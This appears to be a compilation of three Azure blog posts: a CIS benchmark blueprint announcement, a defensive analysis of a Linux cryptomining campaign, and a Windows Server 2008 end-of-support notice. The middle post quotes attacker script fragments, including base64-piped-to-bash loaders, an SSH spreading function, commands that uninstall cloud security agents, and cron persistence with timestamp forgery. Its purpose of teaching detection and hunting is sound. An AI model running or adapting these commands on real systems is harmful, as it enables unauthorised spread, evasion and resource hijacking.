We’ve released our newest Azure blueprint that maps to another key industry-standard, the Center for Internet Security (CIS) Microsoft Azure Foundations Benchmark. This follows the recent announcement of our Azure blueprint for FedRAMP moderate and adds to the growing list of Azure blueprints for regulatory compliance, which now includes ISO 27001, NIST SP 800-53, PCI-DSS, UK OFFICIAL, UK NHS, and IRS 1075.

Azure Blueprints is a free service that enables cloud architects and central information technology groups to define a set of Azure resources that implements and adheres to an organization's standards, patterns, and requirements. Azure Blueprints makes it possible for development teams to rapidly build and stand up new trusted environments within organizational compliance requirements. Customers can apply the new CIS Microsoft Azure Foundations Benchmark blueprint to new subscriptions as well as existing environments.

CIS benchmarks are configuration baselines and best practices for securely configuring a system developed by CIS, a nonprofit entity whose mission is to ”identify, develop, validate, promote, and sustain best practice solutions for cyber defense.” A global community collaborates in a consensus-based process to develop these internationally recognized security standards for defending IT systems and data against cyberattacks. Used by thousands of businesses, they offer prescriptive guidance for establishing a secure baseline system configuration. System and application administrators, security specialists, and others who develop solutions using Microsoft products and services can use these best practices to assess and improve the security of their applications.

Each of the CIS Microsoft Azure Foundations Benchmark recommendations are mapped to one or more of the 20 CIS Controls that were developed to help organizations improve their cyber defense. The blueprint assigns Azure Policy definitions to help customers assess their compliance with the recommendations. Major elements of all nine sections of the recommendations from the CIS Microsoft Azure Foundation Benchmark v1.1.0 include:

Identity and Access Management (1.0)

Assigns Azure Policy definitions that help you monitor when multi-factor authentication isn't enabled on privileged Azure Active Directory accounts.
Assigns an Azure Policy definition that helps you monitor when multi-factor authentication isn't enabled on non-privileged Azure Active Directory accounts.
Assigns Azure Policy definitions that help you monitor for guest accounts and custom subscription roles that may need to be removed.

Security Center (2.0)

Assigns Azure Policy definitions that help you monitor networks and virtual machines where the Security Center standard tier isn't enabled.
Assigns Azure Policy definitions that helps you ensure that virtual machines are monitored for vulnerabilities and remediated, endpoint protection is enabled, system updates are installed on virtual machines.
Assigns an Azure Policy definition that helps you ensure virtual machine disks are encrypted.

Storage Accounts (3.0)

Assigns an Azure Policy definition that helps you monitor storage accounts that allow insecure connections.
Assigns an Azure Policy definition that helps you monitor storage accounts that allow unrestricted access.
Assigns an Azure Policy definition that helps you monitor storage accounts that don't allow access from trusted Microsoft services.

Database Services (4.0)

Assigns an Azure Policy definition that helps ensure SQL Server auditing is enabled as well as properly configured, and logs are retained for at least 90 days.
Assigns an Azure Policy definition that helps you ensure advanced data security notifications are properly enabled.
Assigns an Azure Policy definition that helps you ensure that SQL Servers are configured for encryption and other security settings.

Logging and Monitoring (5.0)

Assigns Azure Policy definitions that help you ensure a log profile exists and is properly configured for all Azure subscriptions, and activity logs are retained for at least one year.

Networking (6.0)

Assigns an Azure Policy definition that helps you ensure Network Watcher is enabled for all regions where resources are deployed.

Virtual Machines (7.0)

Assigns an Azure Policy definition that helps you ensure disk encryption is enabled on virtual machines.
Assigns an Azure Policy definition that helps you ensure that only approved virtual machine extensions are installed.
Assigns Azure Policy definitions that help you ensure that system updates are installed, and endpoint protection is enabled on virtual machines.

Other Security Considerations (8.0)

Assigns an Azure Policy definition that helps you ensure that key vault objects are recoverable in the case of accidental deletion.
Assigns an Azure Policy definition that helps you ensure role-based access control is used to managed permissions in Kubernetes service clusters

AppService (9.0)

Assigns an Azure Policy definition that helps you ensure web applications are accessible only over secure connections.
Assigns Azure Policy definitions that help you ensure web applications are only accessible using HTTPS, use the latest version of TLS encryption, and are only reachable by clients with valid certificates.
Assigns Azure Policy definitions to ensure that .Net Framework, PHP, Python, Java, and HTTP versions are the latest.

Azure customers seeking to implement compliance with CIS Benchmarks should note that although this Azure Blueprint may help customers assess compliance with particular configuration recommendations, it does not ensure full compliance with all requirements of the CIS Benchmark and CIS Controls. In addition, recommendations are associated with one or more Azure Policy definitions, and the compliance standard includes recommendations that aren't addressed by any Azure Policy definitions in blueprints at this time. Therefore, compliance in Azure Policy will only consist of a partial view of your overall compliance status.  Customers are ultimately responsible for meeting the compliance requirements applicable to their environments and must determine for themselves whether particular information helps meet their compliance needs.

Learn more about the CIS Microsoft Azure Foundation Benchmark blueprint in our documentation.
Quelle: Azure

Learning from cryptocurrency mining attack scripts on Linux

Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers. In the past, we've talked about how some attackers use brute force techniques to guess account names and passwords and use those to gain access to machines. Today, we're talking about an attack that a few of our customers have seen where a service is exploited to run the attackers code directly on the machine hosting the service.

This attack is interesting for several reasons. The attacker echoes in their scripts so we can see what they want to do, not just what executes on the machine. The scripts cover a wide range of possible services to exploit so they demonstrate how far the campaign can reach. Finally, because we have the scripts themselves, we can pull out good examples from the Lateral Movement, Defense Evasion, Persistence, and Objectives sections of the Linux MITRE ATT&CK Matrix and use those to talk about hunting on your own data.

Initial vector

For this attack, the first indication something is wrong in the audited logs is an echo command piping a base64 encoded command into base64 for decoding then piping into bash. Across our users, this first command has a parent process of an application or service exposed to the internet and the command is run by the user account associated with that process. This indicates the application or service itself was exploited in order to run the commands. While some of these accounts are specific to a customer, we also see common accounts like Ubuntu, Jenkins, and Hadoop being used. 

/bin/sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYm

luOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K<snip>CmRvbm

UK|base64 -d|bash"

Scripts

It is worth taking a brief aside to talk about how this attacker uses scripts. In this case, they do nearly everything through base64 encoded scripts. One of the interesting things about those scripts is they start with the same first two lines: redirecting both the standard error and standard output stream to /dev/null and setting the path variable to locations the attacker knows generally hold the system commands they want to run. 

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

This indicates that when each of them is base64 encoded, the first part of the encoding is the same every time.

ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYm

luOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K

The use of the same command is particularly helpful when trying to tie attacks together across a large set of machines. The scripts themselves are also interesting because we can see what the attacker intended to run. As defenders, it can be very valuable to look at attacker scripts whenever you can so you can see how they are trying to manipulate systems. For instance, this attacker uses a for loop to cycle through different possible domain names. This type of insight gives defenders more data to pivot on during an investigation.

for h in onion.glass civiclink.network tor2web.io onion.sh onion.mn onion.in.net onion.to
do
if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then
x t<snip>v.$h
else
break
fi
done

We observed this attacker use over thirty different encoded scripts across a number of customers, but they boiled down to roughly a dozen basic scripts with small differences in executable names or download sites. Within those scripts are some interesting examples that we can tie directly to the MITRE ATT&CK Matrix for Linux.

Lateral Movement

While it isn’t the first thing the attacker does, they do use an interesting combination Discovery (T1018: Remote System Discovery) and Lateral Movement (T1021: Remote Services) techniques to infect other hosts. They grep through the files .bash_history, /etc/hosts, and .ssh/known_hosts looking for IP addresses. They then attempt to pass their initial encoded script into each host using both the root account and the account they compromised on their current host without a password. Note, the xssh function appears before the call in the original script. 

hosts=$(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |awk -F: {'print $2'}|sort|uniq ;awk {'print $1'} $HOME/.ssh/known_hosts|sort|uniq|grep -v =|sort|uniq)
for h in $hosts;do xssh root $h; xssh $USER $h & done
——
xssh() {
ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no $1@$2 'echo ZXhlYyA<snip>KZG9uZQo=|base64 -d|bash'
}

In each case, after the initial foothold is gained, the attacker uses a similar set of Defense Evasion techniques.

Defense Evasion

Over various scripts, the attacker uses the T1107: File Deletion, T1222: File and Directory Permissions Modification, and T1089: Disabling Security Tools techniques, as well as the obvious by this point, T1064: Scripting.

In one script they first they make a randomly named file:

z=./$(date|md5sum|cut -f1 -d" ")

After they download their executable into that file, they modify the downloaded file for execution, run it, then delete the file from disk:

chmod +x $z;$z;rm -f

In another script, the attacker tries to download then run uninstall files for the Alibaba Cloud Security Server Guard and the AliCloud CloudMonitor service (the variable $w is set as a wget command earlier in the script).

$w update.aegis.aliyun.com/download/uninstall.sh|bash
$w update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
/usr/local/qcloud/stargate/admin/uninstall.sh

Persistence

Once the coin miner is up and running, this attacker uses a combination of T1168: Local Job Scheduling and T1501: Systemd Service scheduled tasks for persistence. The below is taken from another part of a script where they echo an ntp call and one of their base64 encoded scripts into the file systemd-ntpdate then add a cron job to run that file. The encoded script here is basically the same as their original script that started off the intrusion.

echo -e "#x21/bin/bashnexec &>/dev/nullnntpdate ntp.aliyun.comnsleep $((RANDOM % 600))necho ZXhlYyAmPi9<snip>2gKZmkK|base64 -d|bash" > /lib/systemd/systemd-ntpdate
echo "0 * * * * root /lib/systemd/systemd-ntpdate" > /etc/cron.d/0systemd-ntpdate
touch -r /bin/grep /lib/systemd/systemd-ntpdate
touch -r /bin/grep /etc/cron.d/0systemd-ntpdate
chmod +x /lib/systemd/systemd-ntpdate

Objectives

As previously mentioned, the main objective of this attacker is to get a coin miner started. They do this in the very first script that is run using the T1496: Resource Hijacking tactic. One of the interesting things about this attack is that while they start by trying to get the coin miner going with the initially compromised account, one of the subsequent scripts attempts to get it started using commands from different pieces of software (T1072: Third-party Software).

ansible all -m shell -a 'echo ZXh<snip>uZQo=|base64 -d|bash'
knife ssh 'name:*' 'echo ZXh<snip>uZQo=|base64 -d|bash'
salt '*' cmd.run 'echo ZXh<snip>ZQo=|base64 -d|bash'

Hunting

ASC Linux customers should expect to see coin mining or suspicious download alerts from this type of activity, but what if you wanted to hunt for it yourself? If you use the above script examples, there are several indicators you could follow up on, especially if you have command line logging. 

Do you see unexpected connections to onion and tor sites?
Do you see unexpected ssh connections between hosts?
Do you see an increase in activity from a particular user?
Do you see base64 commands echoed, decoded, then piped into bash? Any one of those could be suspicious depending on your own network.
Check your cron jobs, do you see wgets or base64 encoded lines there?
Check the services running on your machines, do you see anything unexpected?
In reference to the Objectives section above, do you see commands for pieces of software you don’t have installed?

Azure Sentinel can help with your hunting as well. If you are an Azure Security Center customer already, we make it easy to integrate into Azure Sentinel.

Defense

In addition to hunting, there are a few things you can do to defend yourself from these types of attacks. If you have internet-facing services, make sure you are keeping them up to date, are changing any default passwords, and taking advantage of some of the other credential management tools Azure offers like just-in-time (JIT), password-less sign-in, and Azure Key Vault. Monitor your Azure machine utilization rates; an unexpected increase in usage could indicate a coin miner. Check out other ideas at the Azure Security Center documentation page. 

Identifying attacks on Linux systems

Coin miners represent a continuing threat to machines exposed to the internet. While it's generally easy to block a known-bad IP or use a signature-based antivirus, by studying attacker tactics, techniques, and procedures, defenders can find new and more reliable ways to protect their environments.

While we talk about a specific coin miner attacker in this post, the basic techniques highlighted above are used by many different types of attackers of Linux systems. We see Lateral movement, Defense Evasion, and Persistence techniques similar to the above used by different attackers regularly and are continually adding new detections based on our investigations.
Quelle: Azure

Turning to a new chapter of Windows Server innovation

Today, January 14, 2020, marks the end of support for Windows Server 2008 and Windows Server 2008 R2. Customers loved these releases, which introduced advancements such as the shift from 32-bit to 64-bit computing and server virtualization. While support for these popular releases ends today, we are excited about new innovations in cloud computing, hybrid cloud, and data that can help server workloads get ready for the new era.

We want to thank customers for trusting Microsoft as their technology partner. We also want to make sure that we work with all our customers to support them through this transition while applying the latest technology innovations to modernize their server workloads.

We are pleased to offer multiple options to as you make this transition. Learn how you can take advantage of cloud computing in combination with Windows Server as you make this transition. Here are some of our customers that are using Azure for their Windows Server workloads.

Customers using Azure for their Windows Server workloads

Customers such as All Scripts, Tencent, Alaska Airlines, and Altair Engineering are using Azure to modernize their apps and services. One great example of this is from JB Hunt Transport Services, Inc. which has over 3.5 million trucks on the road every single day.

See how JB Hunt has driven their digital transformation with Azure:

How you can take advantage of Azure for your Windows Server workloads

You can deploy Windows Server workloads in Azure in various ways such as Azure Virtual Machines (VMs), Azure VMware Services, and Azure Dedicated Hosts. You can apply Azure Hybrid Benefit to use existing Windows Server licenses in Azure. The benefits are immediate and tangible, Azure Hybrid Benefit alone saves 40 percent in cost. Use the Azure Total Cost of Ownership Calculator to estimate your savings by migrating your workloads to Azure.

As you transition your Windows Server workloads to the cloud, Azure offers additional app modernization options. For example, you can migrate Remote Desktop Service to Windows Virtual Desktop on Azure, which offers the best virtual desktop experience, multi-session Windows 10, and elastic scale. You can migrate on-premises SQL Server to Azure SQL database, which offers Hyperscale, artificial intelligence, and advanced threat detection to modernize and secure your databases. Plus, you can future proof your apps, no more patching and upgrades, which is a huge benefit to many IT organizations.

Free extended security updates on Azure

We understand comprehensive upgrades are traditionally a time-consuming process for many organizations. To ensure that you can continue to protect your workloads, you can take advantage of three years of extended security updates, which you can learn more about here, for your Windows Server 2008 and Windows Server 2008 R2 servers only on Azure. This will allow you more time to plan the transition paths for your business-critical apps and services.

How you can take advantage of latest innovations in Windows Server on-premises

If your business model requires that your servers must stay on-premises, we recommend upgrading to the latest Windows Server.

Windows Server 2019 is the latest and the most quickly adopted Windows Server version ever. Millions of instances have been deployed by customers worldwide. Hybrid capabilities of Windows Server 2019 have been designed to help customers integrate Windows Server on-premises with Azure on their own terms. Windows Server 2019 adds additional layers of security such as Windows Defender Advanced Threat Protection (ATP) and Defender Exploit Guard, which improves even further when you connect to Azure. With Kubernetes support for Windows containers, you can deploy modern-containerized Windows apps on-premises or on Azure.

With Windows Server running on-premises, you can still leverage Azure services for backup, update management, monitoring, and security. To learn how you can start using these capabilities, we recommend trying Windows Admin Center – a free, browser-based app included as part of Windows Server licenses that makes server management easier than ever.

Start innovating with your Window Server workloads

Getting started with the latest release of Windows Server 2019 has never been easier.

Try the latest Windows Server 2019 on Azure and read the Windows Server Migration Guide
Learn about Extended Security Updates
Learn about Azure Migration Program to transform server workloads.
Download Windows Admin Center for hybrid management

Today also marks the end of support for Windows 7. To learn more, visit the Microsoft 365 blog.
Quelle: Azure